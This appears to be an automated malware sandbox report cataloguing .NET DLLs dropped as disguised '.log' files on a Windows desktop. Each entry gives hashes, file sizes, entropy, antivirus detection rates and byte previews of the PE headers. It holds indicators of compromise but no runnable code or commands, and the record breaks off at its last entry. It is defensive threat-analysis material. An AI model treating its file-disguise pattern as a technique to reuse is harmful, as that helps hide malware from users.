                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\SYQgAPKa.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34304
                                                                                        Entropy (8bit):5.618776214605176
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\SingkCdX.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22016
                                                                                        Entropy (8bit):5.41854385721431
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\TfOoGCsS.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):46592
                                                                                        Entropy (8bit):5.870612048031897
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\ThILVSlx.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34304
                                                                                        Entropy (8bit):5.618776214605176
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\UXWdwFYk.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33792
                                                                                        Entropy (8bit):5.541771649974822
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\VZRFxCWH.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):294912
                                                                                        Entropy (8bit):6.010605469502259
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                        C:\Users\user\Desktop\VkvurCps.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):41472
                                                                                        Entropy (8bit):5.6808219961645605
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\WBPEscIu.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):40448
                                                                                        Entropy (8bit):5.7028690200758465
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\WgiUHyMw.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32256
                                                                                        Entropy (8bit):5.631194486392901
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\XQlMiBJi.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34816
                                                                                        Entropy (8bit):5.636032516496583
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\XjnFxUBI.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):24576
                                                                                        Entropy (8bit):5.535426842040921
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\XmhcMluo.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):294912
                                                                                        Entropy (8bit):6.010605469502259
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                        C:\Users\user\Desktop\Zallyypm.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):36352
                                                                                        Entropy (8bit):5.668291349855899
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\ZrGvzZJn.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32256
                                                                                        Entropy (8bit):5.631194486392901
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\afwLyhfm.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):22016
                                                                                        Entropy (8bit):5.41854385721431
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\bQGwUejE.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):50176
                                                                                        Entropy (8bit):5.723168999026349
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\bcXTThuh.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33280
                                                                                        Entropy (8bit):5.634433516692816
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\dVnCFeff.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38400
                                                                                        Entropy (8bit):5.699005826018714
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\exStwvKV.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64000
                                                                                        Entropy (8bit):5.857602289000348
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\fSOKaeua.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
